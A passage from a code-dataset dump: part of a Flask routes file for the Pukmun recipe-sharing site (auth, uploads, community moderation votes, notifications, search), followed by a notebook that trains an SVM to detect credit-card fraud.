User.query.get(int(id))\n\n@app.template_filter('timeago')\ndef fromnow(date):\n return timeago.format(date, datetime.utcnow())\n\n@app.route('/favicon.ico')\ndef favicon():\n return send_from_directory(os.path.join(app.root_path, 'static'),'favicon.ico', mimetype='image/vnd.microsoft.icon')\n\n@app.route('/recipe//', methods=['GET', 'POST'])\ndef recipe(recipe_name, recipe_id):\n form = CommentForm()\n recipe = Recipe.query.filter_by(id=recipe_id, approved=True).first_or_404()\n page = request.args.get('page', 1, type=int)\n comments = 
Comment.query.filter_by(recipe_id=recipe.id).order_by(Comment.timestamp.asc()).paginate(\n page, app.config['COMMENTS_PER_PAGE'], False)\n if form.validate_on_submit():\n comment = Comment(content=form.content.data, author=current_user, recipe_id=recipe.id)\n db.session.add(comment)\n db.session.commit()\n flash('Your comment has been published.', 'alert-success')\n last_page = len(comments.items)\n return redirect(url_for('recipe', page=last_page, recipe_name=recipe.urlify(), recipe_id=recipe.id, _anchor='comments'))\n return render_template('recipe.html', recipe_name=recipe_name, recipe_id=recipe_id, form=form, title=recipe.name, recipe=recipe, user=recipe.author, comments=comments, clean_desc=Markup(recipe.description.replace(' ', ' ')).striptags())\n\n\n@app.route('/add_recipe', methods=['GET', 'POST'])\n@login_required\ndef add_recipe():\n form = RecipeForm()\n if form.validate_on_submit():\n uploaded_file = request.files['image']\n extension = uploaded_file.filename.split('.')[-1].lower()\n listTags = ','.join([tag.strip() for tag in form.tags.data.split(',')])\n recipe = Recipe(name=form.name.data, category=form.category.data, tags=listTags, serves=int(form.serves.data), description=form.description.data, ingredients=form.ingredients.data, steps=form.steps.data, author=current_user)\n seed = \"{:0>5d}\".format(randint(0,99999))\n filename = f'{recipe.urlify()}-by-{recipe.author.username.lower()}-{seed}.{extension}'\n uploaded_file.save(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n resized_image = Image.open(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n resized_image.thumbnail((1100, sys.maxsize),Image.ANTIALIAS)\n resized_image.save(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n thumb = Image.open(os.path.join(app.config['IMG_UPLOAD_PATH'], filename))\n o_width, o_height = thumb.size\n if 1.0 * o_height / o_width > 0.75:\n thumb.thumbnail((500, sys.maxsize),Image.ANTIALIAS)\n else:\n thumb.thumbnail((sys.maxsize ,375),Image.ANTIALIAS)\n width, height = thumb.size\n thumb = thumb.crop(((width - 500)/2, (height - 375)/2, (width + 500)/2, (height + 375)/2))\n thumb.save(os.path.join(app.config['THUMBNAIL_PATH'], filename))\n recipe.image = filename\n db.session.add(recipe)\n current_user.notifications.append(Notification(content=f\"Your \\\"{recipe.name}\\\" recipe is now being moderated by our community.
 No worries, that's normal! Every single recipe follows the same process.
What's next? Read our FAQ.\"))\n db.session.commit()\n flash('Your recipe has been sent for moderation! (Read FAQ)', 'alert-warning')\n return redirect(url_for('index')) \n return render_template('add_recipe.html', title='Add Recipe', form=form)\n\n@app.route('/index', methods=['GET'])\n@app.route('/', methods=['GET'])\ndef index():\n if not current_user.is_authenticated:\n flash(f'Please log in to enjoy the full Pukmun experience', 'alert-info')\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title='Home', recipes=recipes, url=\"index\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_global', methods=['GET'])\ndef top_global():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(RecipeLike.timestamp).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top Global\", recipes=recipes,\n label=\"Top\", value=\"Global\", url='top_global',\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_month', methods=['GET'])\ndef top_month():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=30),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 30 days\", recipes=recipes,\n url='top_month', label=\"Top\", value=\"last 30 days\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_week', methods=['GET'])\ndef top_week():\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=7),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 7 days\", recipes=recipes,\n url=\"top_week\", label=\"Top\", value=\"last 7 days\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/top_24h', methods=['GET'])\ndef top_24h():\n top_users = User.query.join(Recipe).filter(Recipe.approved == 
True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n top_recipes = Recipe.query.filter(Recipe.approved == True).outerjoin(RecipeLike).group_by(Recipe).order_by(func.count(case([(RecipeLike.timestamp >= datetime.utcnow() - timedelta(days=1),1)])).desc())\n page = request.args.get('page', 1, type=int)\n recipes = top_recipes.paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"top.html\", title=\"Top last 24 hours\", recipes=recipes,\n url=\"top_24h\", label=\"Top\", value=\"last 24 hours\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/cookbook', methods=['GET'])\n@login_required\ndef cookbook():\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = current_user.followed_recipes().paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template('cookbook.html', title='Cookbook',\n recipes=recipes, url=\"cookbook\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n flash('Already logged in.', 'alert-warning')\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter(or_(User.username.ilike(form.username_or_email.data), User.email.ilike(form.username_or_email.data))).first()\n if user is None or not user.check_password(form.password.data):\n flash('Invalid username or password', 'alert-danger')\n return redirect(url_for('login'))\n elif not user.confirmed:\n flash(f'You still need to confirm your email. Didn\\'t get the email. Send me another confirmation email', 'alert-danger')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n flash('Logged in successfully!', 'alert-success')\n next_page = request.args.get('next')\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('index')\n return redirect(next_page)\n return render_template('login.html', title='Sign In', form=form)\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n flash('Already logged in', 'alert-warning')\n return redirect(url_for('index'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(form.password.data)\n db.session.add(user)\n db.session.commit()\n flash('User registered! 
Please check your e-mail to confirm your account.', 'alert-success')\n send_confirmation_email(user)\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n@app.route('/user/')\n@login_required\ndef user(username):\n user = User.query.filter(User.username.ilike(username)).first_or_404()\n page = request.args.get('page', 1, type=int)\n recipes = user.my_approved_recipes().order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n form = EmptyForm()\n return render_template('user.html', title=user.username, user=user, recipes=recipes,\n url=\"user\", form=form,\n clean_about_me=Markup(user.about_me.replace(' ', ' ')).striptags())\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n@app.route('/edit_profile', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form_edit_profile = EditProfileForm(current_user.username, current_user.email)\n form_edit_avatar = UploadAvatarForm()\n if form_edit_avatar.validate_on_submit() and form_edit_avatar.submit.data:\n f = request.files.get('image')\n raw_filename = avatars.save_avatar(f)\n session['raw_filename'] = raw_filename\n return redirect(url_for('crop'))\n elif form_edit_profile.validate_on_submit() and form_edit_profile.submit.data:\n current_user.username = form_edit_profile.username.data\n current_user.about_me = form_edit_profile.about_me.data\n flash('Your changes have been saved.', 'alert-success')\n if current_user.email.lower() != form_edit_profile.email.data.lower():\n current_user.email = form_edit_profile.email.data\n current_user.confirmed = False\n db.session.commit()\n flash('Please check your e-mail to confirm your new e-mail address.', 'alert-info')\n send_confirmation_email(current_user)\n logout_user()\n return redirect(url_for('login'))\n current_user.email = form_edit_profile.email.data\n db.session.commit()\n return redirect(url_for('user', username=current_user.username.lower()))\n elif request.method == 'GET':\n form_edit_profile.username.data = current_user.username\n form_edit_profile.email.data = current_user.email\n form_edit_profile.about_me.data = current_user.about_me\n return render_template('edit_profile.html', title='Edit Profile',\n form_avatar=form_edit_avatar, form_profile=form_edit_profile)\n\n@app.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter(User.username.ilike(username)).first()\n if user is None:\n flash(f'User {username} not found.', 'alert-danger')\n return redirect(url_for('index'))\n if user == current_user:\n flash('You cannot follow yourself!', 'alert-danger')\n return redirect(url_for('user', username=username))\n current_user.follow(user)\n db.session.commit()\n flash(f'You are following {username}!', 'alert-success')\n return redirect(url_for('user', username=username))\n else:\n flash(f'Something went wrong.', 'alert-danger')\n return redirect(url_for('index'))\n\n@app.route('/upvote/', methods=['POST'])\n@login_required\ndef upvote(recipe):\n form = EmptyForm()\n if form.validate_on_submit():\n recipe_voted = Recipe.query.filter_by(id=recipe, approved=False).first()\n if recipe_voted is None:\n flash(f'[ERROR] Recipe doesn\\'t exist or it has already been approved.', 'alert-danger')\n elif Vote.query.filter_by(voter_id=current_user.id, recipe_id=recipe_voted.id).first() is not None:\n 
flash(f'[ERROR] You\\'ve already voted this recipe.', 'alert-danger')\n else:\n vote = Vote(voter_id=current_user.id, recipe_id=recipe, is_positive=True)\n db.session.add(vote)\n flash(f'Thanks for your vote!', 'alert-success')\n if recipe_voted.upvotes() >= app.config['VOTES_TO_APPROVE']:\n recipe_voted.approve()\n for vote_to_remove in recipe_voted.votes_received():\n db.session.delete(vote_to_remove)\n new_notification = Notification(content=f'Congratulations, your {recipe_voted.name} recipe has just been approved by the community and is online.
 Thanks for keeping Pukmun going!', recipient_id=recipe_voted.author.id)\n db.session.add(new_notification)\n db.session.commit()\n else:\n flash(f'That\\'s not the way it works!', 'alert-danger')\n return redirect(url_for('index'))\n return redirect(url_for('moderate'))\n\n@app.route('/downvote/<recipe>', methods=['POST'])\n@login_required\ndef downvote(recipe):\n form = EmptyForm()\n if form.validate_on_submit():\n recipe_voted = Recipe.query.filter_by(id=recipe, approved=False).first()\n if recipe_voted is None:\n flash(f'[ERROR] Recipe doesn\\'t exist or it has already been approved.', 'alert-danger')\n elif Vote.query.filter_by(voter_id=current_user.id, recipe_id=recipe_voted.id).first() is not None:\n flash(f'[ERROR] You\\'ve already voted this recipe.', 'alert-danger')\n else:\n vote = Vote(voter_id=current_user.id, recipe_id=recipe, is_positive=False)\n db.session.add(vote)\n flash(f'Thanks for your vote!', 'alert-success')\n if recipe_voted.downvotes() >= app.config['VOTES_TO_REJECT']:\n new_notification = Notification(content=f'Dear user, your {recipe_voted.name} recipe has sadly been rejected by the community.
Read our FAQ to understand more about the process.', recipient_id=recipe_voted.author.id)\n db.session.add(new_notification)\n db.session.delete(recipe_voted)\n os.remove(os.path.join(app.config['IMG_UPLOAD_PATH'], recipe_voted.image))\n os.remove(os.path.join(app.config['THUMBNAIL_PATH'], recipe_voted.image))\n db.session.commit()\n else:\n flash(f'That\\'s not the way it works!', 'alert-danger')\n return redirect(url_for('index'))\n return redirect(url_for('moderate'))\n\n@app.route('/moderate', methods=['GET'])\n@login_required\ndef moderate():\n #left-join\n recipe = Recipe.query.outerjoin(Vote).filter(Recipe.approved == False, Recipe.author != current_user, or_(Vote.voter_id == None, Vote.voter_id != current_user.id)).order_by(func.random()).first()\n form = EmptyForm()\n return render_template('moderate.html', title='Moderation Area',\n recipe=recipe, form=form)\n\n@app.route('/privacy', methods=['GET'])\ndef privacy():\n return render_template('privacy.html', title='Privacy Notice')\n\n@app.route('/legal', methods=['GET'])\ndef legal():\n return render_template('legal.html', title='Legal Terms')\n\n@app.route('/see/', methods=['POST'])\n@login_required\ndef see(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id, Notification.seen == False).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already marked as seen.', 'alert-danger')\n else:\n notif.seen = True\n db.session.commit()\n flash(f'Message marked as seen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/see_all', methods=['POST'])\n@login_required\ndef see_all():\n form = EmptyForm()\n if form.validate_on_submit():\n notifications = Notification.query.filter(Notification.recipient_id == current_user.id, Notification.seen == False).all()\n for notification in notifications:\n notification.seen = True\n db.session.commit()\n flash(f'Everything marked as seen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/remove_all', methods=['POST'])\n@login_required\ndef remove_all():\n form = EmptyForm()\n if form.validate_on_submit():\n notifications = Notification.query.filter(Notification.recipient_id == current_user.id).all()\n for notification in notifications:\n db.session.delete(notification)\n db.session.commit()\n flash(f'All notifications removed', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/unsee/', methods=['POST'])\n@login_required\ndef unsee(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id, Notification.seen == True).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already marked as unseen.', 'alert-danger')\n else:\n notif.seen = False\n db.session.commit()\n flash(f'Message marked as unseen!', 'alert-success')\n return redirect(url_for('msg'))\n\n@app.route('/remove_notification/', methods=['POST'])\n@login_required\ndef remove_notification(notification):\n form = EmptyForm()\n if form.validate_on_submit():\n notif = Notification.query.filter(Notification.id == notification, Notification.recipient_id == current_user.id).first()\n if notif is None:\n flash(f'[ERROR] Message does not exist or was already removed', 'alert-danger')\n else:\n db.session.delete(notif)\n db.session.commit()\n flash(f'Message removed!', 'alert-success')\n return 
redirect(url_for('msg'))\n\n@app.route('/unfollow/<username>', methods=['POST'])\n@login_required\ndef unfollow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = User.query.filter(User.username.ilike(username)).first()\n if user is None:\n flash(f'User {username} not found.', 'alert-danger')\n return redirect(url_for('index'))\n if user == current_user:\n flash('You cannot unfollow yourself!', 'alert-danger')\n return redirect(url_for('user', username=username))\n current_user.unfollow(user)\n db.session.commit()\n flash(f'You are not following {username}.', 'alert-success')\n return redirect(url_for('user', username=username))\n else:\n flash(f'Something went wrong.', 'alert-danger')\n return redirect(url_for('index'))\n\n@app.route('/msg')\n@login_required\ndef msg():\n form = EmptyForm()\n page = request.args.get('page', 1, type=int)\n notifications = Notification.query.filter_by(recipient_id=current_user.id).order_by(Notification.timestamp.desc()).paginate(\n page, app.config['NOTIFICATIONS_PER_PAGE'], False)\n return render_template(\"notifications.html\", title='Notifications', form=form,\n notifications=notifications, url=\"msg\") \n\n@app.route('/liked')\n@login_required\ndef liked():\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.likes.any(user_id=current_user.id)).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title='Liked', recipes=recipes,\n url=\"liked\", label=\"Favourites\",\n comments=latest_comments, top_users=top_users)\n\n@app.route('/search', methods=['POST'])\ndef searchPost():\n search = request.form['search']\n return redirect(url_for('search', search=search.lower()))\n\n@app.route('/search/<search>', methods=['GET'])\ndef search(search):\n if not search:\n search = request.get_data()\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, or_(Recipe.name.like('%' + search + '%'), Recipe.tags.like('%' + search + '%'))).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Search: \"+search, recipes=recipes,\n url=\"search\", label=\"Search\", value=search,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/category/<category>')\ndef category(category):\n page = request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, Recipe.category.like('%' + category + '%')).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Category: \"+category, recipes=recipes,\n url=\"category\", label='Category', value=category,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/tag/<tag>')\ndef tag(tag):\n page = 
request.args.get('page', 1, type=int)\n top_users = User.query.join(Recipe).filter(Recipe.approved == True).group_by(User).order_by(func.count(User.recipes).desc()).limit(3).all()\n latest_comments = Comment.query.order_by(Comment.timestamp.desc()).limit(5).all()\n recipes = Recipe.query.filter(Recipe.approved == True, Recipe.tags.like('%' + tag + '%')).order_by(Recipe.timestamp.desc()).paginate(\n page, app.config['RECIPES_PER_PAGE'], False)\n return render_template(\"index.html\", title=\"Tag: \"+tag, recipes=recipes,\n url=\"tag\", label=\"Tag\", value=tag,\n comments=latest_comments, top_users=top_users)\n\n@app.route('/reset_password_request', methods=['GET', 'POST'])\ndef reset_password_request():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = ResetPasswordRequestForm()\n if form.validate_on_submit():\n user = User.query.filter(User.email.ilike(form.email.data)).first()\n if user:\n send_password_reset_email(user)\n flash('Check your email for the instructions to reset your password', 'alert-info')\n return redirect(url_for('login'))\n return render_template('reset_password_request.html',\n title='Reset Password', form=form)\n\n@app.route('/confirmation_request', methods=['GET', 'POST'])\ndef confirmation_request():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = ConfirmationRequestForm()\n if form.validate_on_submit():\n user = User.query.filter(User.email.ilike(form.email.data)).first()\n if user:\n send_confirmation_email(user)\n flash('Check your email for the instructions to confirm your account', 'alert-info')\n return redirect(url_for('login'))\n return render_template('confirmation_request.html',\n title='Confirmation Request', form=form)\n\n@app.route('/reset_password/', methods=['GET', 'POST'])\ndef reset_password(token):\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n user = User.verify_reset_password_token(token)\n if not user:\n flash('Invalid request (Link expired?)', 'alert-danger')\n return redirect(url_for('index'))\n form = ResetPasswordForm()\n if form.validate_on_submit():\n user.set_password(form.password.data)\n db.session.commit()\n flash('Your password has been reset.', 'alert-success')\n return redirect(url_for('login'))\n return render_template('reset_password.html', form=form)\n\n@app.route('/confirmation/', methods=['GET', 'POST'])\ndef confirmation(token):\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n user = User.verify_confirmation_token(token)\n if not user:\n flash('Invalid request (Link expired?)', 'alert-danger')\n return redirect(url_for('index'))\n else:\n user.confirmed = True\n db.session.commit()\n flash('Your e-mail has been confirmed.', 'alert-success')\n return redirect(url_for('login'))\n\n@app.route('/avatars/')\ndef get_avatar(filename):\n return send_from_directory(app.config['AVATARS_SAVE_PATH'], filename)\n\n@app.route('/img/')\ndef get_img(filename):\n if filename == '':\n return send_from_directory(app.config['IMG_UPLOAD_PATH'], \"no_img.png\")\n return send_from_directory(app.config['IMG_UPLOAD_PATH'], filename)\n\n@app.route('/img/thumbs/')\ndef get_thumb(filename):\n if filename == '':\n return send_from_directory(app.config['THUMBNAIL_PATH'], \"no_img.png\")\n return send_from_directory(app.config['THUMBNAIL_PATH'], filename)\n\n@app.route('/crop', methods=['GET', 'POST'])\n@login_required\ndef crop():\n form = CropAvatarForm()\n if form.validate_on_submit():\n filenames = 
avatars.crop_avatar(session['raw_filename'], form.x.data, form.y.data, form.w.data, form.h.data)\n current_user.avatar_s = url_for('get_avatar', filename=filenames[0])\n current_user.avatar_m = url_for('get_avatar', filename=filenames[1])\n current_user.avatar_l = url_for('get_avatar', filename=filenames[2])\n db.session.commit()\n os.remove(os.path.join(app.config['AVATARS_SAVE_PATH'], session['raw_filename']))\n flash('Your changes have been saved.', 'alert-success')\n return redirect(url_for('edit_profile'))\n return render_template('crop.html', title='Crop Image', form=form)\n\n@app.route('/like//')\n@login_required\ndef like_action(recipe_id, action):\n recipe = Recipe.query.filter_by(id=recipe_id, approved=True).first_or_404()\n if action == 'like':\n current_user.like_recipe(recipe)\n db.session.commit()\n flash('You now like this recipe.', 'alert-success')\n if action == 'unlike':\n current_user.unlike_recipe(recipe)\n db.session.commit()\n flash('You don\\'t like this recipe anymore.', 'alert-success')\n return redirect(request.referrer)","repo_name":"xiringuelu/pukmun","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":29982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36009468349","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Credit Card Fraud Detection\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import svm\n\nimport itertools\n\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\nimport seaborn as sns\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[4]:\n\n\ndata = pd.read_csv('creditcard.csv')\ndata.head()\n\n\n# In[5]:\n\n\ndf = pd.DataFrame(data)\n\n\n# In[6]:\n\n\ndf.shape #checking the size of the data\n\n\n# In[7]:\n\n\n# checking the information\ndf.info()\n\n\n# In[8]:\n\n\ndf.describe()\n\n\n# In[9]:\n\n\ndf_fraud = df[df['Class'] == 1] \nplt.figure(figsize=(15,10))\nplt.scatter(df_fraud['Time'], df_fraud['Amount']) \nplt.title('Amount Fraud')\nplt.xlabel('Time')\nplt.ylabel('Amount')\nplt.xlim([0,175000])\nplt.ylim([0,2500])\nplt.show()\n\n\n# In[10]:\n\n\nbig_fraud = df_fraud[df_fraud['Amount'] > 1000].shape[0]\nprint('There are only '+ str(big_fraud) + ' frauds where the amount was bigger than 1000 over ' + str(df_fraud.shape[0]) + ' frauds')\n\n\n# # Unbalanced Data\n\n# In[12]:\n\n\nfraud = len(data[data.Class==1])\nno_fraud = len(data[data.Class ==0])\nprint('There are only '+ str(fraud) + ' frauds in the original dataset, even though there are ' + str(no_fraud) +' no frauds in the dataset.')\n\n\n# In[13]:\n\n\n# Accuracy of the fraudlent\nprint(\"The accuracy of the classifier then would be : \"+ str((284315-492)/284315)+ \" which is the number of good classification over the number of tuple to classify\")\n\n\n# # Correlation Features\n\n# In[15]:\n\n\ndf_corr = df.corr() \n\n\n# In[16]:\n\n\n# Heatmap\nplt.figure(figsize=(15,10))\nsns.heatmap(df_corr, cmap=\"YlGnBu\")\nsns.set(font_scale=2,style='white')\n\nplt.title('Heatmap correlation')\nplt.show()\n\n\n# In[17]:\n\n\nrank = df_corr['Class'] # Retrieving the correlation coefficients per feature in relation to the feature class\ndf_rank = pd.DataFrame(rank) \ndf_rank = np.abs(df_rank).sort_values(by='Class',ascending=False) # Ranking the absolute values of the coefficients\n # in descending order\ndf_rank.dropna(inplace=True) # Removing Missing Data (not a 
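# A standalone sketch of the correlation-ranking step above, using a tiny
# hypothetical frame in place of the credit-card data: features are ranked
# by the absolute value of their correlation with the Class label.
import numpy as np
import pandas as pd

toy = pd.DataFrame({
    "V1": [0.1, -0.3, 0.5, 0.2, 0.9],
    "V2": [1.2, 0.7, -0.1, 0.4, -0.5],
    "Class": [0, 0, 1, 0, 1],
})
rank = toy.corr()["Class"]
toy_rank = np.abs(pd.DataFrame(rank)).sort_values(by="Class", ascending=False)
toy_rank.dropna(inplace=True)
print(toy_rank)   # Class ranks itself first, with correlation 1.0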
number)\n\n\n# # Data Selection\n\n# In[18]:\n\n\n# First we build our train dataset\ndf_train_all = df[0:150000] # We cut in two the original dataset\ndf_train_1 = df_train_all[df_train_all['Class'] == 1] # We seperate the data which are the frauds and the no frauds\ndf_train_0 = df_train_all[df_train_all['Class'] == 0]\nprint('In this dataset, we have ' + str(len(df_train_1)) +\" frauds so we need to take a similar number of non-fraud\")\n\ndf_sample=df_train_0.sample(300)\ndf_train = df_train_1.append(df_sample) # We gather the frauds with the no frauds. \ndf_train = df_train.sample(frac=1) # Then we mix our dataset\n\n\n# In[19]:\n\n\nX_train = df_train.drop(['Time', 'Class'],axis=1) # We drop the features Time (useless), and the Class (label)\ny_train = df_train['Class'] # We create our label\nX_train = np.asarray(X_train)\ny_train = np.asarray(y_train)\n\n\n# In[20]:\n\n\n###############\ndf_test_all = df[150000:]\n\nX_test_all = df_test_all.drop(['Time', 'Class'],axis=1)\ny_test_all = df_test_all['Class']\nX_test_all = np.asarray(X_test_all)\ny_test_all = np.asarray(y_test_all)\n\n\n# In[21]:\n\n\n\nX_train_rank = df_train[df_rank.index[1:11]] # We take the first ten ranked features\nX_train_rank = np.asarray(X_train_rank)\n\n\n# In[22]:\n\n\nX_train_rank = df_train[df_rank.index[1:11]] # We take the first ten ranked features\nX_train_rank = np.asarray(X_train_rank)\n\n\n# In[23]:\n\n\n\nX_test_all_rank = df_test_all[df_rank.index[1:11]]\nX_test_all_rank = np.asarray(X_test_all_rank)\ny_test_all = np.asarray(y_test_all)\n\n\n# # Confusion Matrix\n\n# In[25]:\n\n\nclass_names=np.array(['0','1']) # Binary label, Class = 1 (fraud) and Class = 0 (no fraud)\n\n\n# In[26]:\n\n\n# Function to plot the confusion Matrix\ndef plot_confusion_matrix(cm, classes,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = 'd' \n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\n\n# # Model Selection\n\n# In[27]:\n\n\nclassifier = svm.SVC(kernel='linear') # We set a SVM classifier, the default SVM Classifier (Kernel = Radial Basis Function)\n\n\n# In[28]:\n\n\n\nclassifier.fit(X_train, y_train) # Then we train our model, with our balanced data train.\n\n\n# # Testing the Model\n\n# In[29]:\n\n\nprediction_SVM_all = classifier.predict(X_test_all) #And finally, we predict our data test.\n\n\n# In[30]:\n\n\ncm = confusion_matrix(y_test_all, prediction_SVM_all)\nplot_confusion_matrix(cm,class_names)\n\n\n# In[31]:\n\n\nprint('Our criterion give a result of ' \n + str( ( (cm[0][0]+cm[1][1]) / (sum(cm[0]) + sum(cm[1])) + 4 * cm[1][1]/(cm[1][0]+cm[1][1])) / 5))\n\n\n# In[32]:\n\n\nprint('We have detected ' + str(cm[1][1]) + ' frauds / ' + str(cm[1][1]+cm[1][0]) + ' total frauds.')\nprint('\\nSo, the probability to detect a fraud is ' + str(cm[1][1]/(cm[1][1]+cm[1][0])))\nprint(\"the accuracy is : \"+str((cm[0][0]+cm[1][1]) / (sum(cm[0]) + sum(cm[1]))))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ 
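# The fraud-detection prints above derive recall and accuracy directly from
# confusion-matrix cells; a self-contained recap with made-up labels, where
# sklearn's metric helpers give the same numbers as the manual arithmetic:
from sklearn.metrics import accuracy_score, confusion_matrix, recall_score

y_true = [0, 0, 0, 1, 1, 1]
y_pred = [0, 1, 0, 1, 0, 1]
cm = confusion_matrix(y_true, y_pred)
recall = cm[1][1] / (cm[1][1] + cm[1][0])        # detected frauds / all frauds
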